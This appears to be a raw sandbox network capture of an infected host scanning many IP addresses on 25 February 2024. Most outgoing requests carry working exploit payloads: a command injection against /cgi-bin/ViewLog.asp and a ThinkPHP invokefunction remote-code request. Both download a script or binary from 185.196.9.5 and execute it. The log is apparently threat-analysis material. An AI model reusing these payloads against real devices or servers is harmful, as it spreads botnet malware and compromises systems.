65 6e 20 c3 a5 74 67 c3 a4 72 64 20 73 6f 6d 20 6b 6c 69 65 6e 74 65 6e 20 62 65 67 c3 a4 72 64 65 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE><LINK rel= stylesheet href= /form.css><META http-equiv=content-type content='text/html; charset=UTF-8'><STYLE type=text/javascript>classes.num.all.fontFamily = Courier; classes.num.all.fontSize = 10pt;</STYLE></HEAD><BODY><H1>400 Felaktig begran</H1>Den hr servern stdjer inte den tgrd som klienten begrde.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1287	192.168.2.15	42962	85.204.25.124	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:43.110784054 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:44.132514000 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:45.316755056 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:47.748555899 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1288	192.168.2.15	38910	95.84.228.87	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:43.326380014 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1289	192.168.2.15	54276	94.103.88.6	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:43.330120087 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:43.550246000 CET	970	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 774 Date: Sun, 25 Feb 2024 18:06:21 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 37 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/cgi-bin/ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.75</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1290	192.168.2.15	43984	94.123.62.141	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:43.332168102 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1291	192.168.2.15	51582	88.219.3.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:44.316057920 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:44.492373943 CET	110	IN	HTTP/1.0 404 Content-Type: text/html Data Raw: 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 2f 31 2e 30 20 34 30 34 20 d5 d2 b2 bb b5 bd b6 d4 cf f3 0a 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e Data Ascii: <body><h1>HTTP/1.0 404 </h1></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1292	192.168.2.15	34262	88.221.40.136	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:44.316510916 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:44.490498066 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:44 GMT Date: Sun, 25 Feb 2024 18:05:44 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 61 37 31 30 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 34 34 26 23 34 36 3b 32 38 33 36 32 63 30 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.da71002.1708884344.28362c01</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1293	192.168.2.15	39722	95.87.42.201	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:44.708558083 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1294	192.168.2.15	60608	31.136.59.34	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:44.765537977 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:45.348659039 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:46.504439116 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:49.028446913 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1295	192.168.2.15	40656	31.136.159.250	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:44.769819975 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:45.380695105 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:46.564474106 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:49.028438091 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1296	192.168.2.15	37026	94.120.107.35	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:44.810523987 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1297	192.168.2.15	43286	95.100.31.79	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:44.831217051 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:45.163254023 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:44 GMT Date: Sun, 25 Feb 2024 18:05:44 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 36 66 62 31 33 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 34 34 26 23 34 36 3b 33 34 63 33 30 32 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.26fb1302.1708884344.34c3024</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1298	192.168.2.15	51366	94.230.157.119	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:44.956326008 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:45.163295984 CET	448	IN	HTTP/1.1 401 Unauthorized Date: Sun, 25 Feb 2024 18:05:21 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Content-encoding: gzip Connection: close WWW-Authenticate: Basic realm="WF2780_EU" user" Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 67 65 74 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 66 72 6f 6d 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY><H1>401 Unauthorized</H1>Your client does not have permission to get URL /cgi-bin/ViewLog.asp from this server.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1299	192.168.2.15	58352	94.121.21.149	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:45.030841112 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1300	192.168.2.15	47486	94.120.4.75	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:45.030950069 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1301	192.168.2.15	55390	94.122.0.36	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:45.034461021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1302	192.168.2.15	50144	94.120.105.144	8080

Timestamp	Bytes transferred	Direction	Data
